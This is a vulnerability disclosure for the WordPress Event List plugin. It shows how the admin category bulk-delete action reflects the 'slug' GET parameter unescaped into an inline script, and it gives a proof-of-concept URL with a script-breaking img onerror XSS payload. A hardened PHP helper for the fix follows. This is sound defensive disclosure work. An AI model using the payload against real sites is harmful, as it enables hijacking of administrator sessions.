Software Link: https://wordpress.org/plugins/event-list/
Vulnerability code:

event-list/includes/admin-categories.php

$is_disabled = '1' == $this->options->get('el_sync_cats');
require_once(EL_PATH.'admin/includes/category_table.php');
$category_table = new EL_Category_Table($is_disabled);
$category_table->prepare_items();

/event-list/admin/includes/category_table.php

private function process_bulk_action() {
    if(!$this->is_disabled) {
        //Detect when a bulk action is being triggered...
        if( 'delete_bulk' === $this->current_action() ) {
            // Show confirmation window before deleting
            echo '<script language="JavaScript">eventlist_deleteCategory ("'.implode( ', ', $_GET['slug'] ).'");</script>';
        }
    }
}
Once the user turns off the "Sync Categories" switch, $is_disabled is false and the delete_bulk branch echoes $_GET['slug'] into the inline script without any escaping.

POC:
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_categories&action=delete_bulk&slug[0]=1&slug[1]=2</script><img+src=1+onerror=alert(1)>
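A hardened version of the confirmation output, added here as an example and not the plugin's own fix. It assumes WordPress core is loaded (sanitize_title() and wp_json_encode() exist in wp-admin); the helper name el_build_delete_confirmation is hypothetical.

```php
<?php
// Added example, not the Event List plugin's own code. Assumes WordPress
// core helpers sanitize_title() and wp_json_encode() are available, as they
// are inside wp-admin. The helper name below is hypothetical.

/**
 * Build the delete-confirmation <script> from the raw request value.
 * Returns '' when the input is not a usable list of slugs.
 */
function el_build_delete_confirmation($raw_slugs) {
    // The vulnerable code implode()s $_GET['slug'] directly, so a scalar
    // would also error there; insist on an array of strings.
    if (!is_array($raw_slugs)) {
        return '';
    }
    $slugs = array();
    foreach ($raw_slugs as $slug) {
        if (!is_string($slug)) {
            continue;
        }
        // sanitize_title() strips tags and keeps only slug characters
        // (lowercase letters, digits, '-' and '_'), so "</script>" and the
        // <img onerror=...> payload from the PoC cannot survive into output.
        $clean = sanitize_title($slug);
        if ('' !== $clean) {
            $slugs[] = $clean;
        }
    }
    if (empty($slugs)) {
        return '';
    }
    // Hand the list to JavaScript as a JSON literal instead of string
    // concatenation. JSON_HEX_TAG encodes '<' and '>' as \u003C / \u003E,
    // so even an unexpected character could not close the <script> element.
    $arg = wp_json_encode(
        implode(', ', $slugs),
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_QUOT | JSON_HEX_APOS
    );
    return '<script>eventlist_deleteCategory(' . $arg . ');</script>';
}

// Call site, mirroring the plugin's process_bulk_action() branch:
// if (!$this->is_disabled && 'delete_bulk' === $this->current_action()) {
//     echo el_build_delete_confirmation(isset($_GET['slug']) ? $_GET['slug'] : null);
// }
```

With the PoC request above, the sanitised slugs no longer contain markup and the JSON-encoded argument is treated by the browser as string data, not as a new element.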